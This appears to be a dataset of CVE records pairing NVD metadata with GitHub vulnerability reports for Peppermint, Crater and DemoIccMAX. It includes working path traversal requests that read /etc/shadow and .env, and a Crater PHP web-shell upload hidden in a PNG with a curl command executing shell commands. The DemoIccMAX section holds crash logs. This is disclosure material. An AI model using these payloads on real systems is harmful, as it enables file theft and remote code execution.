The application allows users to download files. The `filepath` parameter is vulnerable to a path traversal resulting in reading/downloading arbitrary files from the server. ```http POST /api/v1/users/file/download?filepath=./../../../../../etc/passwd HTTP/1.1 Host: localhost:5000 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryb7JNKIvHMye0lm1h [...] ------WebKitFormBoundaryb7JNKIvHMye0lm1h-- ```
Vulnerability: Arbitrary File Download (unauthenticated)
https://api.github.com/repos/Peppermint-Lab/peppermint/issues/108/comments
2
2022-07-21T04:59:27Z
2023-06-10T11:40:16Z
https://github.com/Peppermint-Lab/peppermint/issues/108
1,312,603,587
108
5,706
CVE-2023-46864
2023-10-30T00:15:39.200
Peppermint Ticket Management through 0.2.4 allows remote attackers to read arbitrary files via a /api/v1/ticket/1/file/download?filepath=../ POST request.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/Peppermint-Lab/peppermint/issues/171" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/Peppermint-Lab/peppermint/issues/171" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:peppermint:peppermint:*:*:*:*:*:*:*:*", "matchCriteriaId": "B8FFA273-1A2B-4C79-921A-660D074E15A8", "versionEndExcluding": null, "versionEndIncluding": "0.2.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/Peppermint-Lab/peppermint/issues/171
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "Peppermint-Lab", "peppermint" ]
# Description When downloading a file attached to a ticket, it was observed to be able to download arbitrary files off the web server due to the filepath query parameter not being validated and passed directly to fs.createReadStream. Instructions to download and run the latest release were followed from here: https://github.com/Peppermint-Lab/peppermint/tree/master#-installation-with-docker # Steps to Reproduce 1. Login to the application. 2. Create a new ticket. 3. Upload a file. 4. Download the file and intercept the request in Burp Suite. 5. Change the filepath parameter to "../../../../../../etc/shadow" or "../../../../../../etc/passwd" or "./.env" # Proof of Concept Request and Response Request: ``` POST /api/v1/ticket/1/file/download?filepath=../../../../../../etc/shadow HTTP/1.1 Host: localhost:5000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.00) Gecko/20100101 Firefox/118.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://localhost:5000/ticket/1 Content-Type: multipart/form-data; boundary=---------------------------9995410711832151211174726991 Content-Length: 61 Origin: http://localhost:5000 Connection: close Cookie: token=<omitted> Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------9995410711832151211174726991-- ``` Response: ``` HTTP/1.1 200 OK Date: Sat, 14 Oct 2023 23:28:05 GMT Connection: close Content-Length: 476 root:!::0::::: bin:!::0::::: daemon:!::0::::: adm:!::0::::: lp:!::0::::: sync:!::0::::: shutdown:!::0::::: halt:!::0::::: mail:!::0::::: news:!::0::::: uucp:!::0::::: operator:!::0::::: man:!::0::::: postmaster:!::0::::: cron:!::0::::: ftp:!::0::::: sshd:!::0::::: at:!::0::::: squid:!::0::::: xfs:!::0::::: games:!::0::::: cyrus:!::0::::: vpopmail:!::0::::: ntp:!::0::::: smmsp:!::0::::: guest:!::0::::: nobody:!::0::::: node:!:<omitted for security> nextjs:!:<omitted for security> ``` # Impact Allowing users to download system files, such as /etc/passwd, /etc/shadow, configuration files, application source code, and other users files. The etc/shadow file and .env file were able to be retrieved through the app. # References https://cwe.mitre.org/data/definitions/22.html https://portswigger.net/web-security/file-path-traversal
Path Traversal - Arbitrary File Download
https://api.github.com/repos/Peppermint-Lab/peppermint/issues/171/comments
5
2023-10-26T17:12:41Z
2023-11-24T20:17:26Z
https://github.com/Peppermint-Lab/peppermint/issues/171
1,964,005,471
171
5,707
CVE-2023-46865
2023-10-30T01:15:21.967
/api/v1/company/upload-logo in CompanyController.php in crater through 6.0.6 allows a superadmin to execute arbitrary PHP code by placing this code into an image/png IDAT chunk of a Company Logo image.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/asylumdx/Crater-CVE-2023-46865-RCE" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/crater-invoice/crater/issues/1267" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/crater-invoice/crater/pull/1271" }, { "source": "cve@mitre.org", "tags": null, "url": "https://notes.netbytesec.com/2023/11/post-auth-rce-in-crater-invoice.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/asylumdx/Crater-CVE-2023-46865-RCE" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/crater-invoice/crater/issues/1267" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/crater-invoice/crater/pull/1271" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://notes.netbytesec.com/2023/11/post-auth-rce-in-crater-invoice.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:craterapp:crater:*:*:*:*:*:*:*:*", "matchCriteriaId": "3D402EFB-A3FF-49C9-81E8-EF904A46277E", "versionEndExcluding": null, "versionEndIncluding": "6.0.6", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/crater-invoice/crater/issues/1267
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "crater-invoice", "crater" ]
**Description** This is a responsible disclosure. I've contacted the maintainers through huntr.dev on april and they have acknowledged the vulnerability but the project seems to be in maintanance for almost a year. I've given them 5 months to fix(they didnt respond after acknowledging it) and think I should let others be aware of this, **Describe the bug** In latest or 6.0.6 version of crater, superadmin is able to upload PHP file instead of an image using the Company Logo upload feature. The Base64Mime.php checking function can be bypassed by embedding a valid PHP payload into an IDAT image chunk. I have used https://github.com/huntergregal/PNG-IDAT-Payload-Generator for the poc. `python3 .\generate.py -m php -o test.png` Then use superadmin account to upload, change .png to .php in Burp . ``` POST /api/v1/company/upload-logo HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Authorization: undefined company: 1 X-XSRF-TOKEN: eyJpdiI6IjlmTDJpdzRNUUFCNVlObXUvbDN4c2c9PSIsInZhbHVlIjoidjJCdVlXemtlQ0NHbzFmTC93dzNxZzVhd0IrOFlYd1d6aUxCZWFJWElTd3pDTEdoTlNUT1o1S2NRMWp5cWRhckJVejhiZVArRThPbGxzSGRsVTg5QkJBY1RKdDhnOEt6MkxadHM0MGRPNkErZVRnRkJaenVXZXVrMHVlSkZMVzciLCJtYWMiOiJmMmE2ZWRkNjE4YzZmYTE5NjY1ODgxYWEzNDhkOGJlNzA1MmIxYWQyYmI3MjM2YmRiNjc2NzBmMDE2NDY3NTVhIiwidGFnIjoiIn0= Content-Type: multipart/form-data; boundary=---------------------------5545470669814198892302696268 Content-Length: 552 Origin: http://localhost Connection: close Referer: http://localhost/admin/settings/company-info Cookie: XSRF-TOKEN=eyJpdiI6IjlmTDJpdzRNUUFCNVlObXUvbDN4c2c9PSIsInZhbHVlIjoidjJCdVlXemtlQ0NHbzFmTC93dzNxZzVhd0IrOFlYd1d6aUxCZWFJWElTd3pDTEdoTlNUT1o1S2NRMWp5cWRhckJVejhiZVArRThPbGxzSGRsVTg5QkJBY1RKdDhnOEt6MkxadHM0MGRPNkErZVRnRkJaenVXZXVrMHVlSkZMVzciLCJtYWMiOiJmMmE2ZWRkNjE4YzZmYTE5NjY1ODgxYWEzNDhkOGJlNzA1MmIxYWQyYmI3MjM2YmRiNjc2NzBmMDE2NDY3NTVhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhXdzFQMStlL0lTdHJTekQzTjdCcHc9PSIsInZhbHVlIjoiRnRjWFd5RERVNisrOVQ3Uk94S25DTWVkK1pjZTJUclQzYWV0ZXpQUG93OEhKd0RWV01XZmQ1ZmhlTGVqeDdaSGhPY3NUeDVvTm9xSXYzTVp6anFlbWxRb3JsZlR3YURscXo1UVh5My9nbCt6Y0F2T1Vsd3dESnhsQzZjSkQvR3oiLCJtYWMiOiI3M2ZjZjM0YmZhMTAzMGQwZmVlYTVmMjczNmEyYWUwZDY2MDNmZTcyNmQxMWFhMTk4YWRlMjJiOTNjNmQzZjIxIiwidGFnIjoiIn0%3D; dnXIFPcUKrLKVUG7aQgkhpLkCDcjlGIkv70LWxmf=eyJpdiI6Ilp4VGVCT3lheVViR1FFM0dsaTZkVHc9PSIsInZhbHVlIjoiTkpHTC9Cdzg0djRPWjFESitvdndYMVhRMFpCQ2pTUHRSQnVTOTVNMWh2T1l6SDR0QThIWDhZVDlTNmpsR085ZVJLSFFWRTR6dDdrVEhncTB6NlRQUzhLbHU1ZXJHdmV5WDBsU2U0R0lEeHNzM29abDBFczNDWTBVYUtoQyt0RlJlMmhvY0M2TVdaZFRqbkJvdWd1Zzk2QUxzUzZnb3BlbDZXOUhMeDQ1RkNTeUFwTit4QndOTnEzQzVCejFDbnNPUzBoc0N4dEh3UXBrVDBBSmdFa1dib0M0MHZZS05USWlMQnVFd2VJdmJIV2lhNXJRaGp0OTc2cUZQVXhTTEgzZE9JWWk3NjkrTGRNSnR2SWVwZ25YQjdVTWsySmdaYjQzc1c2KzBYc3lXYmUva3dZanR5Y3FsaGhzbUw5b2wvTExLR3huNHhsdDhKTG9rYjYwMUlrZlNRYzZ0aGVaQWpzSG0veStGYWorNWUyYzRZQ0lzN3NOMzRKV3BnZG1mZ1RsUG8ybk9SSlBhMEEzajZqdDU3OGIzV3RUd3hoQll1WisrbytpdUVMbzUvNm0zazNyWHVDYUZEbStzVFJXd2dDU3ZYY0xvZ0hrZTRNMG1vRzRURXdXanc9PSIsIm1hYyI6IjE5OGJhMTNjM2U5YTU2M2Q4Y2ZjOTRmYWNiOTU4YTMwZmVmMjY1YWJiZjNlYzc3YjI0YzAxODgzN2Q1N2RkZDciLCJ0YWciOiIifQ%3D%3D Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------5545470669814198892302696268 Content-Disposition: form-data; name="company_logo" {"name":"test.php","data":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAIAAAD8GO2jAAAAVklEQVR4nGNcPD89JF9HRVRbMF0oJF9QT1NUWzFdKTs/PljAc143k/yPi9t+X9N9qif38ePJv1/vBnyyMFiXHMwwCkbBKBgFo2AUjIJRMApGwSgYfgAAI0oXArodV7QAAAAASUVORK5CYII="} -----------------------------5545470669814198892302696268 Content-Disposition: form-data; name="is_company_logo_removed" false -----------------------------5545470669814198892302696268-- ``` Then `curl -XPOST -d '1=uname -a' 'http://localhost/storage/1/test.php?0=shell_exec' --output o && cat o` ``` �PNG ▒ IHDR �▒��VIDATx�c\Linux 11f1e6093117 6.1.0-kali5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.12-1kali2 (2023-02-23) x86_64 GNU/Linux X�s^7�����~_�}�'���ɿ_�|�0X��0 F�(▒�`��Q0 F�(▒~#J�W�IEND�B`� ``` **Expected behavior** Php file shouldnt be allowed to be uploaded. A whitelisting of extension should be used to prevent execution of php files. **Please complete the following information:** - Crater version: latest
Post auth remote code exec as superadmin, CVE-2023-46865
https://api.github.com/repos/crater-invoice-inc/crater/issues/1267/comments
5
2023-10-13T10:08:31Z
2023-11-08T05:58:04Z
https://github.com/crater-invoice-inc/crater/issues/1267
1,941,653,997
1,267
5,708
CVE-2023-46866
2023-10-30T03:15:07.783
In International Color Consortium DemoIccMAX 79ecb74, CIccCLUT::Interp3d in IccProfLib/IccTagLut.cpp in libSampleICC.a attempts to access array elements at out-of-bounds indexes.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/InternationalColorConsortium/DemoIccMAX/issues/54" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/InternationalColorConsortium/DemoIccMAX/pull/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/InternationalColorConsortium/DemoIccMAX/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/InternationalColorConsortium/DemoIccMAX/pull/53" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:color:demoiccmax:2022-06-21:*:*:*:*:*:*:*", "matchCriteriaId": "10975878-B3F5-48A0-80B1-2AC1EBD0298D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/InternationalColorConsortium/DemoIccMAX/issues/54
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "InternationalColorConsortium", "DemoIccMAX" ]
## Bug 1 - Heap Buffer Overflow in CIccCLUT::Interp3d | CVE-2023-46866 ### Patch in PR https://github.com/InternationalColorConsortium/DemoIccMAX/pull/64 Severity: Reference Implementation | High ### Description A heap buffer overflow has been identified in the CIccCLUT::Interp3d method. This vulnerability can lead to potential crashes or undefined behavior when certain conditions are met. ### Steps to Reproduce Utilize the CIccCLUT::Interp3d method on a CIccCLUT object under conditions where m_nNumPoints * m_nOutput equals 0. Attempt to access indices beyond the allocated size of the m_pData array. ### Debug Session ``` (lldb) fr se 5 frame #5: 0x0000000100e8c982 libIccProfLib2.2.dylib`CIccCLUT::Interp3d(this=0x0000614000000440, destPixel=0x00007ff7bfefde80, srcPixel=0x00007ff7bfefde80) const at IccTagLut.cpp:2594:27 2591 return; 2592 } 2593 -> 2594 destPixel[i] = p[n000] * dF0 + p[n001] * dF1 + p[n010] * dF2 + p[n011] * dF3 + 2595 p[n100] * dF4 + p[n101] * dF5 + p[n110] * dF6 + p[n111] * dF7; 2596 } 2597 } (lldb) frame variable (CIccCLUT *) this = 0x0000614000000440 (icFloatNumber *) destPixel = 0x00007ff7bfefde80 (const icFloatNumber *) srcPixel = 0x00007ff7bfefde80 (icUInt8Number) mx = '\xff' (icUInt8Number) my = '\xff' (icUInt8Number) mz = '\xff' (icFloatNumber) x = 0 (icFloatNumber) y = 0 (icFloatNumber) z = 0 (icUInt32Number) ix = 0 (icUInt32Number) iy = 0 (icUInt32Number) iz = 0 (icFloatNumber) u = 0 (icFloatNumber) t = 0 (icFloatNumber) s = 0 (icFloatNumber) ns = 1 (icFloatNumber) nt = 1 (icFloatNumber) nu = 1 (icFloatNumber) dF0 = 1 (icFloatNumber) dF1 = 0 (icFloatNumber) dF2 = 0 (icFloatNumber) dF3 = 0 (icFloatNumber) dF4 = 0 (icFloatNumber) dF5 = 0 (icFloatNumber) dF6 = 0 (icFloatNumber) dF7 = 0 (icUInt32Number) maxIndex = 50331647 (icFloatNumber *) pStart = 0x00006020000002d0 (int) i = 0 (icFloatNumber *) p = 0x00006020000002d0 (lldb) dis -s $pc-32 -c 24 libIccProfLib2.2.dylib`CIccCLUT::Interp3d: 0x100e8c962 <+2978>: loopne 0x100e8c961 ; <+2977> at IccTagLut.cpp ``` ### Symptoms - The program crashes with an AddressSanitizer report indicating a heap-buffer-overflow in CIccCLUT::Interp3d. - The value of m_nNumPoints * m_nOutput is 0, indicating that the m_pData array might not have been allocated or is of size 0. - Attempts are made to access indices as high as 3 and potentially up to 50331647 (as indicated by the maxIndex variable). ### Potential Causes - Improper initialization or setup of the CIccCLUT object. - Possible errors in the copy constructor or assignment operator of CIccCLUT. -The m_pData array might be reallocated with a different size elsewhere in the code. -Invalid or corrupt input data affecting the CIccCLUT object's construction. ## Bug 2 - Segmentation Fault in CIccXformMatrixTRC::GetCurve | CVE-2023-46867 Severity: Reference Implementation | High ### Description A segmentation fault (SEGV) has been identified in the CIccXformMatrixTRC::GetCurve method within the IccCmm.cpp file, specifically at line 5240. The crash appears to be due to a read memory access at the zero address, suggesting a potential null pointer dereference. ### Steps to Reproduce Invoke the CIccXformMatrixTRC::GetCurve method with specific input that triggers the SEGV. The exact input causing this behavior needs further investigation. Observe the crash due to a segmentation fault. ### Crash Details ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==59095==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000104511cd4 bp 0x7ff7bc556550 sp 0x7ff7bc556500 T0) ==59095==The signal is caused by a READ memory access. ==59095==Hint: address points to the zero page. #0 0x104511cd4 in CIccXformMatrixTRC::GetCurve(unsigned int) const IccCmm.cpp:5240 #1 0x10451107a in CIccXformMatrixTRC::Begin() IccCmm.cpp:5100 #2 0x1045394a8 in CIccCmm::Begin(bool, bool) IccCmm.cpp:8297 #3 0x1045905a4 in CIccEvalCompare::EvaluateProfile(CIccProfile*, unsigned char, icRenderingIntent, icXformInterp, bool) IccEval.cpp:110 #4 0x104591419 in CIccEvalCompare::EvaluateProfile(char const*, unsigned char, icRenderingIntent, icXformInterp, bool) IccEval.cpp:197 #5 0x1039ae0d2 in main iccRoundTrip.cpp:168 #6 0x7ff80dee53a5 in start+0x795 (dyld:x86_64+0xfffffffffff5c3a5) ==59095==Register values: rax = 0x0000000000000000 rbx = 0x00007ff7bc556900 rcx = 0x0000100000000000 rdx = 0x0000000000000000 rdi = 0x00007ff7bc5562c0 rsi = 0x00007ff7bc556320 rbp = 0x00007ff7bc556550 rsp = 0x00007ff7bc556500 r8 = 0x0000604000001610 r9 = 0xf3f3f300f1f1f100 r10 = 0x00007fffffffffff r11 = 0xffffffffffffff20 r12 = 0x00007ff7bc557590 r13 = 0x0000000000000000 r14 = 0x00000001039addb0 r15 = 0x00007ff7bc557710 AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV IccCmm.cpp:5240 in CIccXformMatrixTRC::GetCurve(unsigned int) const ``` ### Symptoms The program crashes with an AddressSanitizer report indicating a SEGV in CIccXformMatrixTRC::GetCurve. The memory access causing the SEGV is a read operation from address 0x000000000000, which points to the zero page. The crash occurs specifically at line IccCmm.cpp:5240. ### Potential Causes Dereferencing a null pointer or uninitialized pointer in the CIccXformMatrixTRC::GetCurve method. An invalid curve index or parameter passed to the method, leading to out-of-bounds memory access. Memory corruption elsewhere in the application affecting the behavior of the CIccXformMatrixTRC::GetCurve method. ## Bugs 3 - 6 Bug Report: Undefined Behavior in IccTagLut.cpp and IccProfileXml.cpp Severity: Reference Implementation | High The UndefinedBehaviorSanitizer tool has identified multiple instances of undefined behavior within the IccTagLut.cpp and IccProfileXml.cpp files. ### Bug 3 Description File: IccTagLut.cpp Line: 1798 Issue: Index -1 is being used to access an array of type icUInt32Number[16], which results in out-of-bounds access. ### Bug 4 Description File: IccTagLut.cpp Line: 1799 Issue: Index -1 is being used to access an array of type icUInt8Number[16], which results in out-of-bounds access. ### Bug 5 Description File: IccProfileXml.cpp Line: 128 Issue: Loading a value 2543294359 which is not a valid value for the type icPlatformSignature. ### Bug 6 Description File: IccProfileXml.cpp Line: 129 Issue: Loading a value 2543294359 which is not a valid value for the type icPlatformSignature. ## Bug 7 - Heap Buffer Overflow in CIccXmlArrayType::ParseText | CVE-2023-47249 Severity: Reference Implementation | High ### Description A heap buffer overflow has been identified in the function CIccXmlArrayType::ParseText at IccUtilXml.cpp:1003:10. This function is designed to parse text into an array, with a specific instantiation for unsigned short. The buffer overflow occurs during the parsing process, specifically in a loop condition where a buffer bound check fails, leading to an out-of-bounds read. Variables at Crash Time: pBuf: A pointer to the buffer where parsed data is stored. nSize: The size of the buffer (4096). szText: A pointer to the text being parsed. n: Counter variable, which is also 4096 at the time of the crash. Crash Location in Code: The crash occurs in the loop: while (*szText && n<nSize) {. The error indicates that when n equals nSize, the loop still attempts to read *szText, which is beyond the allocated buffer. ### Steps to Reproduce #### PoC ``` Testing % ./iccFromXML mcs/17ChanWithSpots-MVIS.xml mcs/17ChanWithSpots-MVIS.icc ``` #### Crash Details ``` mcs % ../iccFromXML 17ChanWithSpots-MVIS.xml 17ChanWithSpots-MVIS.icc ... SUMMARY: AddressSanitizer: heap-buffer-overflow IccUtilXml.cpp:1003 in CIccXmlArrayType<unsigned short, (icTagTypeSignature)1969828150>::ParseText(unsigned short*, unsigned int, char const*) ``` ## Bug 8 - Floating Point Error in iccSpecSepToTiff.cpp at line 120 Patch in PR https://github.com/InternationalColorConsortium/DemoIccMAX/pull/64 ### Reproduction ``` ./iccSpecSepToTiff out.tif 0 0 Overprint/17ChanData.txt 1 2 ~/Documents/2225-original.icc ``` #### Description Arithmetic Error: The crashing line (-> 0x100006251 <+1585>: idivl 0x230(%rbx)) suggests a division operation. The corresponding source code line (120 n = (end-start)/step + 1;) is performing a division operation. If step is zero, this operation will cause a division by zero error, leading to an FPE. ### Bug 9 SUMMARY: AddressSanitizer: heap-buffer-overflow IccUtilXml.cpp:1062 in CIccXmlArrayType<float, (icTagTypeSignature)1717793824>::ParseText(float*, unsigned int, char const*) ``` mcs % lldb -- ../../Build/Tools/IccFromXml/iccFromXML 18ChanWithSpots-MVIS.xml 18ChanWithSpots-MVIS.icc (lldb) target create "../../Build/Tools/IccFromXml/iccFromXML" Current executable set to 'DemoIccMAX-master/Build/Tools/IccFromXml/iccFromXML' (x86_64). (lldb) settings set -- target.run-args "18ChanWithSpots-MVIS.xml" "18ChanWithSpots-MVIS.icc" (lldb) r Process 79070 launched: 'DemoIccMAX-master/Build/Tools/IccFromXml/iccFromXML' (x86_64) ================================================================= ==79070==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x00010040340c at pc 0x000100990dc5 bp 0x7ff7bfefac70 sp 0x7ff7bfefac68 READ of size 1 at 0x00010040340c thread T0 #0 0x100990dc4 in CIccXmlArrayType<float, (icTagTypeSignature)1717793824>::ParseText(float*, unsigned int, char const*) IccUtilXml.cpp:1062 #1 0x100992462 in CIccXmlArrayType<float, (icTagTypeSignature)1717793824>::ParseTextArrayNum(char const*, unsigned int, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccUtilXml.cpp:818 #2 0x10094e784 in icCLutFromXml(_xmlNode*, int, int, icConvertType, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccTagXml.cpp:3544 #3 0x1008b46ff in CIccMpeXmlExtCLUT::ParseXml(_xmlNode*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccMpeXml.cpp:1935 #4 0x1008bf990 in CIccMpeXmlCalculator::ParseImport(_xmlNode*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccMpeXml.cpp:2577 #5 0x1008d170f in CIccMpeXmlCalculator::ParseXml(_xmlNode*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccMpeXml.cpp:3094 #6 0x10095561d in CIccTagXmlMultiProcessElement::ParseElement(_xmlNode*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccTagXml.cpp:4081 #7 0x1009567b9 in CIccTagXmlMultiProcessElement::ParseXml(_xmlNode*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccTagXml.cpp:4141 #8 0x10090b119 in CIccProfileXml::ParseTag(_xmlNode*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccProfileXml.cpp:711 #9 0x10090c924 in CIccProfileXml::ParseXml(_xmlNode*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccProfileXml.cpp:820 #10 0x10090cd5b in CIccProfileXml::LoadXml(char const*, char const*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>*) IccProfileXml.cpp:877 #11 0x10000406c in main IccFromXml.cpp:68 #12 0x7ff816e9f365 in start+0x795 (dyld:x86_64+0xfffffffffff5c365) 0x00010040340c is located 0 bytes after 2259980-byte region [0x0001001db800,0x00010040340c) allocated by thread T0 here: #0 0x101743a20 in wrap_malloc+0xa0 (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0xdca20) #1 0x10094d4f1 in icCLutFromXml(_xmlNode*, int, int, icConvertType, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccTagXml.cpp:3439 #2 0x1008b46ff in CIccMpeXmlExtCLUT::ParseXml(_xmlNode*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccMpeXml.cpp:1935 #3 0x1008bf990 in CIccMpeXmlCalculator::ParseImport(_xmlNode*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccMpeXml.cpp:2577 #4 0x1008d170f in CIccMpeXmlCalculator::ParseXml(_xmlNode*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccMpeXml.cpp:3094 #5 0x10095561d in CIccTagXmlMultiProcessElement::ParseElement(_xmlNode*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccTagXml.cpp:4081 #6 0x1009567b9 in CIccTagXmlMultiProcessElement::ParseXml(_xmlNode*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccTagXml.cpp:4141 #7 0x10090b119 in CIccProfileXml::ParseTag(_xmlNode*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccProfileXml.cpp:711 #8 0x10090c924 in CIccProfileXml::ParseXml(_xmlNode*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&) IccProfileXml.cpp:820 #9 0x10090cd5b in CIccProfileXml::LoadXml(char const*, char const*, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>*) IccProfileXml.cpp:877 #10 0x10000406c in main IccFromXml.cpp:68 #11 0x7ff816e9f365 in start+0x795 (dyld:x86_64+0xfffffffffff5c365) SUMMARY: AddressSanitizer: heap-buffer-overflow IccUtilXml.cpp:1062 in CIccXmlArrayType<float, (icTagTypeSignature)1717793824>::ParseText(float*, unsigned int, char const*) Shadow bytes around the buggy address: 0x000100403180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000100403200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000100403280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000100403300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000100403380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x000100403400: 00[04]fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x000100403480: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x000100403500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x000100403580: fa 